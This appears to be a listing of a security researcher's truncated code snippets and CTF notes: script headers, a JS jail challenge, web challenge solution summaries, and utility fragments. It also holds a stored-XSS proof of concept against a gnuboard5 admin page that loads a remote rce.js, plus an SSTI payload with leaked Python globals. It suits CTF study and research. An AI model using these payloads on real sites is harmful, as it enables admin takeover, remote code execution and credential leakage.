stypr

import os
import urllib2
import urllib
import random
import sys
import time
import hashlib

def rand(sz=4):
    return str(random.randint(10**sz, 100**sz))

stypr

A-z

Simple JS Jail challenge.

It is run on context, so we have nothing but to play with constructor and console.

1337 === eval(our_input)

stypr

#!/usr/bin/python
#-*- coding:utf-8 -*-
# Developer: Harold Kim (ho.kim@linecorp.com)

import os
import sys
import time
import urllib
import urllib2

stypr

#!/bin/bash
# Maintainer: Harold Kim (root@stypr.com)

# Tested in CentOS 7.6.1810
# $ lsb_release -a
# LSB Version:    :core-4.1-amd64:core-4.1-noarch
# Distributor ID: CentOS
# Description:    CentOS Linux release 7.6.1810 (Core) 
# Release:        7.6.1810
# Codename:       Core

stypr

Quick Summary

First-blooded this challenge. The server is down, I cannot explain briefly

1. Comment in the website shows get_perm.php

2. Another comment in the get_perm.php shows ?remote_debug=1.

3. Using a php trick, you get a write post privilege.

stypr

Solution

1. if(md5($salt.$api_string) !== $sig){ can be bypassed with hash length extension attack (didn't do it, but the key length is 12.)

2. Use custom header and body to trigger CSP bypass.

stypr

<?php

// Ported from papago.py
// v1: b64_enc(rot13([:16]) + [16:])
/* Derived from stackoverflow */
function uuidgen() {
   return sprintf('%08x-%04x-%04x-%04x-%04x%08x',
      mt_rand(0, 0xffffffff),
      mt_rand(0, 0xffff), mt_rand(0, 0xffff), mt_rand(0, 0xffff),
      mt_rand(0, 0xffff), mt_rand(0, 0xffffffff)

stypr

<!--
	Stored XSS (2019.01.02)
-->
<form action="http://10.10.10.60/gnuboard5/adm/sms_admin/form_group_update.php" method="POST">
	<input type='hidden' name='fg_no' value=''>
	<input type='hidden' name='fg_name' id='payload' value=''>
</form>
<script>
	var random = Math.round(Math.random() * 1000000000);
	var script_url = '//10.10.10.30/vulnerable_rce_good_for_reason/rce.js'; // RCE from admin

stypr

#!/usr/bin/python
#Nothing on stackoverflow works!

import zipfile
import sys

zip = zipfile.ZipFile('FILENAME', 'r')
zipinfo = zip.infolist()
for _file in zipinfo:
    _file.filename = bytes(_file.filename).decode('cp949')

stypr

SSTI

1. Write one comment
2. When writing a comment content, do SSTI to leak author's credentials

{rating[comments][0].__class__.__init__.__globals__}
{'__name__': 'app.loaddata', '__doc__': None, '__package__': 'app', '__loader__': <_frozen_importlib_external.SourceFileLoader object at 0x7fa912f51670>, '__spec__': ModuleSpec(name='app.loaddata', loader=<_frozen_importlib_external.SourceFileLoader object at 0x7fa912f51670>, origin='./app/loaddata.py'), '__file__': './app/loaddata.py', '__cached__': './app/__pycache__/loaddata.cpython-38.pyc', '__builtins__': {'__name__': 'builtins', '__doc__': "Built-in functions, exceptions, and other objects.\n\nNoteworthy: None is the `nil' object; Ellipsis represents `...' in slices.", '__package__': '', '__loader__': , '__spec__': ModuleSpec(name='builtins', loader=), '__build_class__': , '__import__': , 'abs': , 'all': , 'any': , 'ascii': , 'bin': , 'breakpoint': , 'callable': , 'chr': , 'compile': , 'delattr': , 'dir': , 'divmod': , 'eval': , 'exec': , 'format':